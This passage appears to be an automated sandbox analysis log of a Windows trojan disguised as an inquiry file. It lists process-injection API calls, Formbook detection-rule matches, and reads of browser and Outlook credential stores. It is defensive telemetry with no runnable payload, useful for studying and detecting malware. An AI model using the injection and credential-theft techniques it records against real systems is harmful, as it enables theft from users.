                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12D30 NtUnmapViewOfSection
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12D10 NtMapViewOfSection
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12D00 NtSetInformationFile
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12EE0 NtQueueApcThread
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12EA0 NtAdjustPrivilegesToken
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12E80 NtReadVirtualMemory
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12E30 NtWriteVirtualMemory
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12FE0 NtCreateFile
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12FB0 NtResumeThread
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12FA0 NtQuerySection
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12F90 NtProtectVirtualMemory
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12F60 NtCreateProcessEx
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12F30 NtCreateSection
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F13090 NtSetValueKey
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F13010 NtOpenDirectoryObject
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F139B0 NtGetContextThread
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F13D70 NtOpenThread
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F13D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D4340 NtSetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D4650 NtSuspendThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2BA0 NtEnumerateValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2BE0 NtQueryValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2BF0 NtAllocateVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2AF0 NtWriteFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2AD0 NtReadFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2F30 NtCreateSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2FB0 NtResumeThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2FE0 NtCreateFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2E80 NtReadVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2EE0 NtQueueApcThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2D30 NtUnmapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2D10 NtMapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2DD0 NtDelayExecution, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2C60 NtCreateKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2CA0 NtQueryInformationToken, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D35C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D39B0 NtGetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D2CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D3010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D3090 NtSetValueKey
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D3D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_032D3D70 NtOpenThread
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_02957AC0 NtCreateFile
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_02957F00 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_02957C20 NtReadFile
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_02957DA0 NtClose
                Source: C:\Windows\SysWOW64\replace.exe, Code function: 21_2_02957D10 NtDeleteFile
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 1380
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Static PE information: invalid certificate
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000000.00000002.1440616018.000000000B800000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000000.00000002.1439262687.0000000007CE2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000000.00000002.1434719451.00000000014BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000000.00000000.1202863988.0000000000F28000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNfo.exe& vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483046509.0000000000A48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameREPLACE.EXEj% vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483417927.0000000000FCD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Binary or memory string: OriginalFilenameNfo.exe& vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, V4uC3Iifq56IKQcfry.cs Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, V4uC3Iifq56IKQcfry.cs Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, unTi9rbmXOPJ0aSMYW.cs Security API names: _0020.SetAccessControl
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, unTi9rbmXOPJ0aSMYW.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, unTi9rbmXOPJ0aSMYW.cs Security API names: _0020.AddAccessRule
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, unTi9rbmXOPJ0aSMYW.cs Security API names: _0020.SetAccessControl
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, unTi9rbmXOPJ0aSMYW.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, unTi9rbmXOPJ0aSMYW.cs Security API names: _0020.AddAccessRule
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, QIxXUl9ykF6i6XwVuL.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, QIxXUl9ykF6i6XwVuL.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, unTi9rbmXOPJ0aSMYW.cs Security API names: _0020.SetAccessControl
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, unTi9rbmXOPJ0aSMYW.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, unTi9rbmXOPJ0aSMYW.cs Security API names: _0020.AddAccessRule
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, QIxXUl9ykF6i6XwVuL.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.3498340.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.77b0000.5.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.3487ce0.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/7@18/11
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.log
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6188
                Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\6a6fb55e-66f1-4fa4-bed9-d1f5f149b05e
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: replace.exe, 00000015.00000003.1668525834.0000000002E2A000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3680182899.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1670794835.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3680182899.0000000002E2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe ReversingLabs: Detection: 31%
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Virustotal: Detection: 50%
                Source: unknown Process created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Process created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Process created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 1380
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
                Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Section loaded: windowscodecs.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: ulib.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\replace.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\replace.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: System.Data.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.pdbL0vw# source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Accessibility.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Nfo.pdb/l source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: wntdll.pdbUGP source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1482858607.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.0000000003260000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1484866148.00000000030B9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Nfo.pdbSHA256 source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
